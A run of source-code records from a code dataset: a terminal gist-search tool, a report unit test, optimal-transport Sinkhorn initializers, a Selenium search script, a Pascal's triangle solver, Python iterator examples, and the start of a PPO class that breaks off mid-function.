# def get_search_strings(self, query):\n # rex_glob = re.compile(r'\\\\g([^\\\\]+)')\n # rex_code = re.compile(r'\\\\c([^\\\\]+)')\n # rex_file = re.compile(r'\\\\f([^\\\\]+)')\n # rex_text = re.compile(r'\\\\t([^\\\\]+)')\n # rex_slash = re.compile(r'\\\\')\n #\n # mg = rex_glob.search(s)\n # if mg:\n # print(f'glob = {mg.group(1)}')\n #\n # mc = rex_code.search(s)\n # if mc:\n # print(f'code = {mc.group(1)}')\n #\n # mf = rex_file.search(s)\n # if mf:\n # print(f'file = {mf.group(1)}')\n #\n # mt = rex_text.search(s)\n # if mt:\n # print(f'text = {mt.group(1)}')\n #\n # ms = rex_slash.search(s)\n # print(f'has slash {bool(ms)}')\n\n # def search_text_change(self, buffer):\n # rex_glob = re.compile(r'\\\\g([^\\\\]+)')\n # rex_code = re.compile(r'\\\\c([^\\\\]+)')\n # rex_file = re.compile(r'\\\\f([^\\\\]+)')\n # rex_text = re.compile(r'\\\\t([^\\\\]+)')\n # rex_slash = re.compile(r'\\\\')\n #\n # app_state = buffer.app_state\n #\n # # query = buffer.text\n # # m_glob = rex\n # app_state.text_expr = buffer.text\n # app_state.sync_list_lines()\n # self.set_code(0)\n # return\n #\n # app_state = 
buffer.app_state\n # doc = buffer.document\n # pos = doc.cursor_position_row\n #\n # content_buffer = app_state.content_buffer\n # content_buffer.read_only = to_filter(False)\n # content_buffer.text = app_state.code(pos)\n # content_buffer.read_only = to_filter(True)\n\n def search_text_change(self, buffer):\n rex_glob = re.compile(r'\\\\g([^\\\\]+)')\n rex_code = re.compile(r'\\\\c([^\\\\]+)')\n rex_file = re.compile(r'\\\\f([^\\\\]+)')\n rex_text = re.compile(r'\\\\t([^\\\\]+)')\n rex_slash = re.compile(r'\\\\$')\n\n app_state = buffer.app_state\n\n query = buffer.text\n m_glob = rex_glob.search(query)\n m_code = rex_code.search(query)\n m_file = rex_file.search(query)\n m_text = rex_text.search(query)\n m_slash = rex_slash.search(query)\n\n self.clear_searches()\n\n if m_slash:\n return\n\n if m_glob:\n self.glob_expr = m_glob.group(1)\n if m_code:\n self.code_expr = m_code.group(1)\n if m_file:\n self.file_expr = m_file.group(1)\n if m_text:\n self.text_expr = m_text.group(1)\n\n if not any([bool(m) for m in [m_glob, m_code, m_file, m_text]]):\n self.text_expr = query\n\n # if m_glob:\n # self.glob_expr = query.replace('\\g', '')\n # elif m_code:\n # self.code_expr = query.replace('\\c', '')\n # elif m_file:\n # self.file_expr = query.replace('\\f', '')\n # else:\n # self.text_expr = query\n\n # app_state.text_expr = buffer.text\n\n app_state.sync_list_lines()\n self.set_code(0)\n return\n\n app_state = buffer.app_state\n doc = buffer.document\n pos = doc.cursor_position_row\n\n content_buffer = app_state.content_buffer\n content_buffer.read_only = to_filter(False)\n content_buffer.text = app_state.code(pos)\n content_buffer.read_only = to_filter(True)\n\n def list_row_change(self, buffer):\n app_state = buffer.app_state\n doc = buffer.document\n pos = doc.cursor_position_row\n\n content_buffer = app_state.content_buffer\n content_buffer.read_only = to_filter(False)\n content_buffer.text = app_state.code(pos)\n content_buffer.read_only = to_filter(True)\n\n def code(self, index):\n self._index = index\n if self.list_recs:\n return list(self.list_recs.values())[self._index]['code']\n else:\n return ''\n\n def set_code(self, index):\n content_buffer = self.content_buffer\n content_buffer.read_only = to_filter(False)\n content_buffer.text = self.code(index)\n content_buffer.read_only = to_filter(True)\n\n @property\n def selected_code(self):\n return self.code(self._index)\n\n @property\n def selected_file_name(self):\n return self.list_lines[self._index]\n\n @property\n def selected_description(self):\n return self.descriptions[self._index]\n\n def print(self):\n if not self.print_on_exit:\n return\n print('\\n', file=sys.stderr)\n print(file=sys.stderr)\n print(self.selected_code, file=sys.stderr)\n print('', file=sys.stderr)\n\n def register_windows(self, *windows):\n self.windows = windows\n self.current_window_index = 0\n\n def focus_window(self, index):\n self.current_window_index = index\n return self.current_window\n\n def next_window(self):\n self.current_window_index = (self.current_window_index + 1) % len(self.windows)\n return self.current_window\n\n @property\n def current_window(self):\n return self.windows[self.current_window_index]\n\n\nclass UI:\n def __init__(self):\n loader = Loader()\n if not loader.has_tables:\n msg = 'You must run sync command'\n print(msg, file=sys.stderr)\n sys.exit(1)\n\n self.state = AppState(loader)\n\n def get_container(self):\n\n list_window = Window(\n width=55,\n left_margins=[NumberedMargin()],\n 
content=BufferControl(buffer=self.state.list_buffer, focusable=True),\n            cursorline=True,\n            style='bg:#AE9EC9 fg:black',\n        )\n\n        code_window = Window(\n            left_margins=[NumberedMargin()],\n            content=BufferControl(buffer=self.state.content_buffer, focusable=True, lexer=PygmentsLexer(Python3Lexer)),\n            ignore_content_width=True\n        )\n\n        search_window = Window(\n            content=BufferControl(\n                buffer=self.state.search_buffer,\n                focusable=True,\n                key_bindings=self.get_search_key_bindings(),\n                # lexer=RainbowLexer()\n\n            ),\n            height=1,\n            style='bg:#1B2631 fg:#F1C40F',\n        )\n\n        self.state.register_windows(list_window, code_window)\n        self.state.search_window = search_window\n\n        main_container = VSplit([list_window, code_window])\n\n\n        root_container = HSplit([\n            main_container,\n            search_window\n        ])\n        return root_container\n\n\n    def get_search_key_bindings(self):\n        kb = KeyBindings()\n\n        @kb.add('enter', eager=True)\n        def _(event):\n            window_to_focus = event.app.state.focus_window(0)\n            event.app.layout.focus(window_to_focus)\n            # event.app.state.search_buffer.text = ''\n            # event.app.state.search_buffer.text = AppState.SEARCH_DEFAULT_TEXT\n            # event.app.state.search_buffer.read_only = to_filter(True)\n            # event.app.state.clear_searches()\n            event.app.state.sync_list_lines()\n\n        return kb\n\n\n\n    def get_key_bindings(self):\n        kb = KeyBindings()\n\n\n        @kb.add('c-c')\n        def _(event):\n            \" Quit application. \"\n            event.app.exit()\n\n        @kb.add('enter')\n        def _(event):\n            \" Print the selected gist on exit and quit. \"\n            event.app.state.print_on_exit = True\n            event.app.exit()\n\n        @kb.add('space', filter=not_in_search_mode)\n        def _(event):\n            \" Switch focus to the next window. \"\n            window_to_focus = event.app.state.next_window()\n            event.app.layout.focus(window_to_focus)\n\n        @kb.add('/')\n        def _(event):\n            \" Enter search mode. \"\n            window_to_focus = event.app.state.search_window\n            event.app.layout.focus(window_to_focus)\n            event.app.state.search_buffer.read_only = to_filter(False)\n            event.app.state.search_buffer.text = ''\n\n        @kb.add('escape')\n        def _(event):\n            \" Leave search mode and reset the search. 
\"\n window_to_focus = event.app.state.focus_window(0)\n event.app.layout.focus(window_to_focus)\n event.app.state.search_buffer.text = AppState.SEARCH_DEFAULT_TEXT\n event.app.state.search_buffer.read_only = to_filter(True)\n event.app.state.clear_searches()\n event.app.state.sync_list_lines()\n\n return kb\n\n def run(self):\n root_container = self.get_container()\n kb = self.get_key_bindings()\n\n layout = Layout(root_container)\n style = Style(\n [\n ('cursor-line', 'fg:ansiwhite bg:#003366'),\n ('cursor-line', 'fg:#CCCCCC bg:#003366'),\n ]\n )\n\n app = Application(\n layout=layout,\n full_screen=True,\n key_bindings=kb,\n editing_mode=EditingMode.VI,\n mouse_support=True,\n style=style,\n )\n self.state.app = app\n self.state.layout = layout\n app.state = self.state\n\n app.run()\n self.state.print()\n\n\n@click.command(help='A CLI tool for searching your gists')\n@click.option('-t', '--token', help='Set up github token')\n@click.option('-s', '--sync', is_flag=True, help='Sync updated gists')\n@click.option('-r', '--reset', is_flag=True, help='Delete and resync all gists')\n@click.option('--fake', is_flag=True, help='Delete and resync all gists')\ndef cli(token, sync, reset, fake):\n if fake:\n Updater().rob()\n return\n if reset:\n Updater().reset()\n elif sync:\n Updater().sync()\n elif token:\n Config().set_github_token(token)\n else:\n UI().run()\n","sub_path":"gistfinder/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":13391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"169829857","text":"import os\nimport unittest\nimport logging\nimport pprint\n\nimport pbcommand.testkit\n\nfrom pbreports.report.preassembly import to_report\n\nfrom base_test_case import LOCAL_DATA\n\n_DATA_DIR = os.path.join(LOCAL_DATA, 'preassembly')\n\nlog = logging.getLogger(__name__)\n\nfiltered_reads = os.path.join(_DATA_DIR, 'filtered_subreads.fasta')\nfiltered_longreads = os.path.join(_DATA_DIR, 'filtered_longreads.fasta')\ncorrected_reads = os.path.join(_DATA_DIR, 'corrected.fasta')\nlength_cutoff = 60\n\n\nclass TestPreassemblyReport(unittest.TestCase):\n\n def test_basic(self):\n \"\"\"Basic smoke test to see if report generation is functioning\"\"\"\n report = to_report(filtered_reads, filtered_longreads, corrected_reads,\n length_cutoff=length_cutoff)\n log.info(\"Generated report: \" + str(report))\n log.info(pprint.pformat(report.to_dict()))\n self.assertIsNotNone(report)\n\n\nclass TestPolishedAssembly(pbcommand.testkit.PbTestApp):\n DRIVER_BASE = \"python -m pbreports.report.preassembly \"\n DRIVER_EMIT = DRIVER_BASE + \" --emit-tool-contract \"\n DRIVER_RESOLVE = DRIVER_BASE + \" --resolved-tool-contract \"\n REQUIRES_PBCORE = True\n INPUT_FILES = [\n filtered_reads,\n filtered_longreads,\n corrected_reads\n ]\n TASK_OPTIONS = {\n \"pbreports.task_options.length_cutoff\": length_cutoff\n }\n","sub_path":"tests/unit/test_pbreports_report_preassembler.py","file_name":"test_pbreports_report_preassembler.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"651133376","text":"# Copyright OTT-JAX\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the 
License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport abc\nfrom typing import Any, Dict, Optional, Sequence, Tuple\n\nimport jax\nimport jax.numpy as jnp\n\nfrom ott import utils\nfrom ott.geometry import pointcloud\nfrom ott.problems.linear import linear_problem\n\n__all__ = [\n \"DefaultInitializer\", \"GaussianInitializer\", \"SortingInitializer\",\n \"SubsampleInitializer\"\n]\n\n\n@jax.tree_util.register_pytree_node_class\nclass SinkhornInitializer(abc.ABC):\n \"\"\"Base class for Sinkhorn initializers.\"\"\"\n\n @abc.abstractmethod\n def init_dual_a(\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n \"\"\"Initialize Sinkhorn potential/scaling f_u.\n\n Args:\n ot_prob: Linear OT problem.\n lse_mode: Return potential if ``True``, scaling if ``False``.\n rng: Random number generator for stochastic initializers.\n\n Returns:\n potential/scaling, array of size ``[n,]``.\n \"\"\"\n\n @abc.abstractmethod\n def init_dual_b(\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n \"\"\"Initialize Sinkhorn potential/scaling g_v.\n\n Args:\n ot_prob: Linear OT problem.\n lse_mode: Return potential if ``True``, scaling if ``False``.\n rng: Random number generator for stochastic initializers.\n\n Returns:\n potential/scaling, array of size ``[m,]``.\n \"\"\"\n\n def __call__(\n self,\n ot_prob: linear_problem.LinearProblem,\n a: Optional[jnp.ndarray],\n b: Optional[jnp.ndarray],\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> Tuple[jnp.ndarray, jnp.ndarray]:\n \"\"\"Initialize Sinkhorn potentials/scalings f_u and g_v.\n\n Args:\n ot_prob: Linear OT problem.\n a: Initial potential/scaling f_u.\n If ``None``, it will be initialized using :meth:`init_dual_a`.\n b: Initial potential/scaling g_v.\n If ``None``, it will be initialized using :meth:`init_dual_b`.\n lse_mode: Return potentials if ``True``, scalings if ``False``.\n rng: Random number generator for stochastic initializers.\n\n Returns:\n The initial potentials/scalings.\n \"\"\"\n rng = utils.default_prng_key(rng)\n rng_x, rng_y = jax.random.split(rng, 2)\n n, m = ot_prob.geom.shape\n if a is None:\n a = self.init_dual_a(ot_prob, lse_mode=lse_mode, rng=rng_x)\n if b is None:\n b = self.init_dual_b(ot_prob, lse_mode=lse_mode, rng=rng_y)\n\n assert a.shape == (\n n,\n ), f\"Expected `f_u` to have shape `{n,}`, found `{a.shape}`.\"\n assert b.shape == (\n m,\n ), f\"Expected `g_v` to have shape `{m,}`, found `{b.shape}`.\"\n\n # cancel dual variables for zero weights\n a = jnp.where(ot_prob.a > 0., a, -jnp.inf if lse_mode else 0.)\n b = jnp.where(ot_prob.b > 0., b, -jnp.inf if lse_mode else 0.)\n\n return a, b\n\n def tree_flatten(self) -> Tuple[Sequence[Any], Dict[str, Any]]: # noqa: D102\n return [], {}\n\n @classmethod\n def tree_unflatten( # noqa: D102\n cls, aux_data: Dict[str, Any], children: Sequence[Any]\n ) -> \"SinkhornInitializer\":\n return cls(*children, **aux_data)\n\n\n@jax.tree_util.register_pytree_node_class\nclass DefaultInitializer(SinkhornInitializer):\n \"\"\"Default initialization of Sinkhorn dual potentials/primal scalings.\"\"\"\n\n def init_dual_a( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: 
Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n del rng\n return jnp.zeros_like(ot_prob.a) if lse_mode else jnp.ones_like(ot_prob.a)\n\n def init_dual_b( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n del rng\n return jnp.zeros_like(ot_prob.b) if lse_mode else jnp.ones_like(ot_prob.b)\n\n\n@jax.tree_util.register_pytree_node_class\nclass GaussianInitializer(DefaultInitializer):\n \"\"\"Gaussian initializer :cite:`thornton2022rethinking:22`.\n\n Compute Gaussian approximations of each\n :class:`~ott.geometry.pointcloud.PointCloud`, then compute closed from\n Kantorovich potential between Gaussian approximations using Brenier's theorem\n (adapt convex/Brenier potential to Kantorovich). Use this Gaussian potential\n to initialize Sinkhorn potentials/scalings.\n \"\"\"\n\n def init_dual_a( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n # import Gaussian here due to circular imports\n from ott.tools.gaussian_mixture import gaussian\n\n del rng\n assert isinstance(\n ot_prob.geom, pointcloud.PointCloud\n ), \"Gaussian initializer valid only for pointcloud geoms.\"\n\n x, y = ot_prob.geom.x, ot_prob.geom.y\n a, b = ot_prob.a, ot_prob.b\n\n gaussian_a = gaussian.Gaussian.from_samples(x, weights=a)\n gaussian_b = gaussian.Gaussian.from_samples(y, weights=b)\n # Brenier potential for cost ||x-y||^2/2, multiply by two for ||x-y||^2\n f_potential = 2 * gaussian_a.f_potential(dest=gaussian_b, points=x)\n f_potential = f_potential - jnp.mean(f_potential)\n return f_potential if lse_mode else ot_prob.geom.scaling_from_potential(\n f_potential\n )\n\n\n@jax.tree_util.register_pytree_node_class\nclass SortingInitializer(DefaultInitializer):\n \"\"\"Sorting initializer :cite:`thornton2022rethinking:22`.\n\n Solve non-regularized OT problem via sorting, then compute potential through\n iterated minimum on C-transform and use this potential to initialize\n regularized potential.\n\n Args:\n vectorized_update: Whether to use vectorized loop.\n tolerance: DualSort convergence threshold.\n max_iter: Max DualSort steps.\n \"\"\"\n\n def __init__(\n self,\n vectorized_update: bool = True,\n tolerance: float = 1e-2,\n max_iter: int = 100\n ):\n super().__init__()\n self.tolerance = tolerance\n self.max_iter = max_iter\n self.vectorized_update = vectorized_update\n\n def _init_sorting_dual(\n self, modified_cost: jnp.ndarray, init_f: jnp.ndarray\n ) -> jnp.ndarray:\n \"\"\"Run DualSort algorithm.\n\n Args:\n modified_cost: cost matrix minus diagonal column-wise.\n init_f: potential f, array of size n. 
This is the starting potential,\n which is then updated to make the init potential, so an init of an init.\n\n Returns:\n potential f, array of size n.\n \"\"\"\n\n def body_fn(\n state: Tuple[jnp.ndarray, float, int]\n ) -> Tuple[jnp.ndarray, float, int]:\n prev_f, _, it = state\n new_f = fn(prev_f, modified_cost)\n diff = jnp.sum((new_f - prev_f) ** 2)\n it += 1\n return new_f, diff, it\n\n def cond_fn(state: Tuple[jnp.ndarray, float, int]) -> bool:\n _, diff, it = state\n return jnp.logical_and(diff > self.tolerance, it < self.max_iter)\n\n fn = _vectorized_update if self.vectorized_update else _coordinate_update\n state = (init_f, jnp.inf, 0) # init, error, iter\n f_potential, _, _ = jax.lax.while_loop(\n cond_fun=cond_fn, body_fun=body_fn, init_val=state\n )\n\n return f_potential\n\n def init_dual_a(\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n init_f: Optional[jnp.ndarray] = None,\n ) -> jnp.ndarray:\n \"\"\"Apply DualSort algorithm.\n\n Args:\n ot_prob: OT problem between discrete distributions.\n lse_mode: Return potential if ``True``, scaling if ``False``.\n rng: Random number generator for stochastic initializers, unused.\n init_f: potential f, array of size ``[n,]``. This is the starting\n potential, which is then updated to make the init potential,\n so an init of an init.\n\n Returns:\n potential/scaling f_u, array of size ``[n,]``.\n \"\"\"\n del rng\n assert not ot_prob.geom.is_online, \\\n \"Sorting initializer does not work for online geometry.\"\n # check for sorted x, y requires point cloud and could slow initializer\n cost_matrix = ot_prob.geom.cost_matrix\n\n assert cost_matrix.shape[0] == cost_matrix.shape[\n 1], \"Requires square cost matrix.\"\n\n modified_cost = cost_matrix - jnp.diag(cost_matrix)[None, :]\n\n n = cost_matrix.shape[0]\n init_f = jnp.zeros(n) if init_f is None else init_f\n\n f_potential = self._init_sorting_dual(modified_cost, init_f)\n f_potential = f_potential - jnp.mean(f_potential)\n\n return f_potential if lse_mode else ot_prob.geom.scaling_from_potential(\n f_potential\n )\n\n def tree_flatten(self) -> Tuple[Sequence[Any], Dict[str, Any]]: # noqa: D102\n return ([], {\n \"tolerance\": self.tolerance,\n \"max_iter\": self.max_iter,\n \"vectorized_update\": self.vectorized_update\n })\n\n\n@jax.tree_util.register_pytree_node_class\nclass SubsampleInitializer(DefaultInitializer):\n \"\"\"Subsample initializer :cite:`thornton2022rethinking:22`.\n\n Subsample each :class:`~ott.geometry.pointcloud.PointCloud`, then compute\n :class:`Sinkhorn potential `\n from the subsampled approximations and use this potential to initialize\n Sinkhorn potentials/scalings for the original problem.\n\n Args:\n subsample_n_x: number of points to subsample from the first measure in\n :class:`~ott.geometry.pointcloud.PointCloud`.\n subsample_n_y: number of points to subsample from the second measure in\n :class:`~ott.geometry.pointcloud.PointCloud`.\n If ``None``, use ``subsample_n_x``.\n kwargs: Keyword arguments for\n :class:`~ott.solvers.linear.sinkhorn.Sinkhorn`.\n \"\"\"\n\n def __init__(\n self,\n subsample_n_x: int,\n subsample_n_y: Optional[int] = None,\n **kwargs: Any,\n ):\n super().__init__()\n self.subsample_n_x = subsample_n_x\n self.subsample_n_y = subsample_n_y or subsample_n_x\n self.sinkhorn_kwargs = kwargs\n\n def init_dual_a( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n 
from ott.solvers.linear import sinkhorn\n\n assert isinstance(\n ot_prob.geom, pointcloud.PointCloud\n ), \"Subsample initializer valid only for pointcloud geom.\"\n rng = utils.default_prng_key(rng)\n rng_x, rng_y = jax.random.split(rng, 2)\n\n x, y = ot_prob.geom.x, ot_prob.geom.y\n a, b = ot_prob.a, ot_prob.b\n\n # subsample\n sub_x = jax.random.choice(\n key=rng_x, a=x, shape=(self.subsample_n_x,), replace=True, p=a, axis=0\n )\n sub_y = jax.random.choice(\n key=rng_y, a=y, shape=(self.subsample_n_y,), replace=True, p=b, axis=0\n )\n\n # create subsampled point cloud geometry\n sub_geom = pointcloud.PointCloud(\n sub_x,\n sub_y,\n epsilon=ot_prob.geom.epsilon,\n scale_cost=ot_prob.geom._scale_cost,\n cost_fn=ot_prob.geom.cost_fn\n )\n\n # run sinkhorn\n subsample_sink_out = sinkhorn.solve(sub_geom, **self.sinkhorn_kwargs)\n\n # interpolate potentials\n dual_potentials = subsample_sink_out.to_dual_potentials()\n f_potential = jax.vmap(dual_potentials.f)(x)\n\n return f_potential if lse_mode else ot_prob.geom.scaling_from_potential(\n f_potential\n )\n\n def tree_flatten(self) -> Tuple[Sequence[Any], Dict[str, Any]]: # noqa: D102\n return ([], {\n \"subsample_n_x\": self.subsample_n_x,\n \"subsample_n_y\": self.subsample_n_y,\n **self.sinkhorn_kwargs\n })\n\n\ndef _vectorized_update(\n f: jnp.ndarray, modified_cost: jnp.ndarray\n) -> jnp.ndarray:\n \"\"\"Inner loop DualSort Update.\n\n Args:\n f: potential f, array of size n.\n modified_cost: cost matrix minus diagonal column-wise.\n\n Returns:\n updated potential vector, f.\n \"\"\"\n return jnp.min(modified_cost + f[None, :], axis=1)\n\n\ndef _coordinate_update(\n f: jnp.ndarray, modified_cost: jnp.ndarray\n) -> jnp.ndarray:\n \"\"\"Coordinate-wise updates within inner loop.\n\n Args:\n f: potential f, array of size n.\n modified_cost: cost matrix minus diagonal column-wise.\n\n Returns:\n updated potential vector, f.\n \"\"\"\n\n def body_fn(i: int, f: jnp.ndarray) -> jnp.ndarray:\n new_f = jnp.min(modified_cost[i, :] + f)\n return f.at[i].set(new_f)\n\n return jax.lax.fori_loop(0, len(f), body_fn, f)\n","sub_path":"src/ott/initializers/linear/initializers.py","file_name":"initializers.py","file_ext":"py","file_size_in_byte":12862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"552897876","text":"# Claudia Trejo, 2017.05.18\n#Chapter 1 Getting Started With Selenium\n\n# Setting up Google Chrome\nimport os\nfrom selenium import webdriver\n\n# Get the path of chromedriver\ndir = os.path.dirname(__file__)\nchrome_driver_path = dir + \"/chromedriver\"\n# Remove the .exe extension on linux or mac platform\n\n# Create a new Chrome session\ndriver = webdriver.Chrome(chrome_driver_path)\ndriver.implicitly_wait(30)\ndriver.maximize_window()\n\n# Navigate to the application home page\ndriver.get(\"https://magento.com/search/gss\")\n\n# Get the search textbox\nsearch_field = driver.find_element_by_id(\"edit-keys\")\nsearch_field.clear()\n\n# Enter search keyword and submit\nsearch_field.send_keys(\"phones\")\nsearch_field.submit()\n\n# Get all the anchor elements which have product names displayed\n# currently on the result page, using the find_elements_by_xpath method\nproducts = driver.find_elements_by_xpath(\"//*[@class='result-title']\")\n\n# Get the number of anchor elements found\nprint(\"Found \" + str(len(products)) + \" products:\" )\n\n# Iterate through each anchor element and print the text, that is,\n# the name of the product\nfor product in products:\n print(product.text)\n\n# Close the browser 
window\ndriver.quit()","sub_path":"LearningSeleniumTestingPython/OwnExamples_py3/search_products_chr.py","file_name":"search_products_chr.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"600532516","text":"class Solution:\n\t# @return a list of lists of integers\n\tdef triangle(self, numRows):\n\t\tif numRows == 0:\n\t\t\treturn []\n\t\telif numRows == 1:\n\t\t\treturn [1]\n\t\telif numRows == 2:\n\t\t\treturn [1,1]\n\t\telse:\n\t\t\ta = self.triangle(numRows - 1)\n\t\t\tb = []\n\t\t\tb.append(1)\n\t\t\tfor i in range(0, len(a) - 1):\n\t\t\t\tb.append(a[i] + a[i+1])\n\t\t\tb.append(1)\n\t\t\treturn b\n\n\tdef generate(self, numRows):\n\t\ta = []\n\t\tif numRows == 0:\n\t\t\treturn []\n\t\tfor i in range(1, numRows + 1):\n\t\t#print(i , self.triangle(i))\n\t\t\ta.append(self.triangle(i))\n\n\t\treturn a\n\ns = Solution()\n#n = int(input())\nn = 500\n#print(s.generate(n))\ns.generate(n)\n","sub_path":"pascals-triangle.py","file_name":"pascals-triangle.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"414087837","text":"\"\"\"-----------------------------------ITERATORS CONCEPTS--------------------------------\"\"\"\n\n# pyforest (commented out below) is a wrapper for numpy, pandas, matplotlib and seaborn\n\"\"\"\nfrom pyforest import *\n\n\n# Create Number Upto 10\n\n# Looping through the list\nclass Iterator_Concepts:\n\n def __init__(self):\n Natural_No = np.arange(1, 10, 1)\n # Getting an iterator through iter()\n # print('-----------------FIRST APPROACH OF CREATING AN ITERATOR By USING iter()-------------------')\n iteri_concepts = iter(Natural_No)\n # Iterating through it using next()\n\n print(next(iteri_concepts))\n print('-------------------SECOND APPROACH OF CREATING AN ITERATOR BY USING .__next__() ------------')\n print(iteri_concepts.__next__())\n print(\"Creating A Function to Iterate through\")\n print()\n\n for i in iteri_concepts:\n print(i, end=' ')\n\n def my_iterator(self):\n print('My Iterator Function')\n try:\n # counter = 0\n # print('The counter =', counter)\n my_list_2 = np.arange(10, 140, 10)\n my_iter_1 = iter(my_list_2)\n for i in my_iter_1:\n if i == 120:\n continue\n else:\n print(i)\n except NameError:\n print('Name is not defined')\n except Exception:\n print(\"Other Exception\")\n finally:\n print('The execution is done')\n\n\nif __name__ == \"__main__\":\n a = Iterator_Concepts()\n a.my_iterator()\n\"\"\"\n\n# Some Basic Example to understand Iterators in depth\n\"\"\"\nclass Addition:\n def __init__(self, a: int, b: int) -> int:\n try:\n self.a = a\n self.b = b\n except NameError:\n print('The Name is not defined properly')\n except TypeError:\n print('The Type should be specified correctly')\n except Exception:\n pass\n\n def __iter__(self):\n '''The __iter__() function returns an\n iterator for the given object (array, set, tuple etc. 
or custom objects).\r\n It creates an object that can be accessed one element at a time using __next__()\r\n function, which generally comes in handy when dealing with loops.\r\n '''\n try:\n\n self.result = self.a + self.b\n return f\"The result is \", self.result\n except TypeError:\n print('The Type should be specified Correctly')\n except Exception:\n pass\n\n def __next__(self):\n print('No Value Present Please Write Once ')\n\n\nif __name__ == \"__main__\":\n Addition_no = Addition(3, 3)\n print(Addition_no.__iter__())\n print(Addition_no.__iter__())\n Addition_no.__next__()\n\n\"\"\"\n\n# Here we are taking an example of powers of 2: in each iteration the exponent starts from zero and runs up to the set number\n\"\"\"\nclass PowTwo:\n '''Class to Implement an Iterator of power of two '''\n\n def __init__(self, max):\n self.max = max\n\n def __iter__(self):\n self.n = 0\n return self\n\n def __next__(self):\n if self.n <= self.max:\n result = 2 ** self.n\n self.n += 1\n return result\n else:\n raise StopIteration\n\n\nif __name__ == \"__main__\":\n\n numbers = PowTwo(10)\n i = iter(numbers)\n for item in numbers:\n print(item)\n \n\"\"\"\n\n\n# Now using a simple example to showcase iterators\nclass TopTen:\n\n def __init__(self):\n self.n = 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.n <= 10:\n val = self.n\n self.n += 1\n return val\n else:\n raise StopIteration\n\n\nif __name__ == \"__main__\":\n\n TopTen_no = TopTen()\n a = iter(TopTen_no)\n for i in a:\n print(i, end=' ')\n","sub_path":"Advance Python Topics/Iterator_Example.py","file_name":"Iterator_Example.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"319024585","text":"\"\"\"\nPPO\n\"\"\"\n\nimport numpy as np\nimport scipy.signal\nimport tensorflow as tf\nfrom gym.spaces import Box, Discrete\nfrom scipy.sparse.linalg import cg\n\nEPS = 1e-8\n\nclass PPO:\n def __init__(\n self,\n env,\n lr_pi=0.01,\n lr_v=0.01,\n gamma=0.99,\n lam=0.97,\n output_graph=False,\n seed=1,\n ep_max=100,\n ep_steps_max=4000,\n hidden_sizes=(64, 64),\n train_v_iters=80,\n train_pi_iters=80,\n clip=0.2,\n target_kl=0.01\n ):\n np.random.seed(seed)\n tf.set_random_seed(seed)\n self.lr_pi = lr_pi\n self.lr_v = lr_v\n self.gamma = gamma\n self.ep_max = ep_max\n self.ep_steps_max = ep_steps_max\n self.train_v_iters = train_v_iters\n self.train_pi_iters = train_pi_iters\n self.lam = lam\n self.clip = clip\n self.target_kl = target_kl\n\n self.s = self._get_placeholder(env.observation_space, name='observations')\n self.a = self._get_placeholder(env.action_space, name='actions')\n print(\"observations: \", self.s)\n print(\"actions: \", self.a)\n\n self._build_net(hidden_sizes=hidden_sizes, action_space=env.action_space)\n\n self.sess = tf.Session()\n\n if output_graph:\n # $ tensorboard --logdir=logs\n # http://0.0.0.0:6006/\n tf.summary.FileWriter(\"logs/\", self.sess.graph)\n\n self.sess.run(tf.global_variables_initializer())\n\n def _get_placeholder(self, space, name):\n if isinstance(space, Box):\n shape = space.shape # (act_dim, )\n dim = (None, ) if shape[0] == 1 else (None, *shape)\n # dim = (None, shape) if np.isscalar(shape) else (None, *shape)\n print(\"shape: \", shape, \" dim: \", dim)\n return tf.placeholder(dtype=tf.float32, shape=dim, name=name)\n elif isinstance(space, Discrete):\n return tf.placeholder(dtype=tf.int32, shape=(None,), name=name)\n else:\n raise NotImplementedError\n\n def _gaussian_likelihood(self, x, mu, 
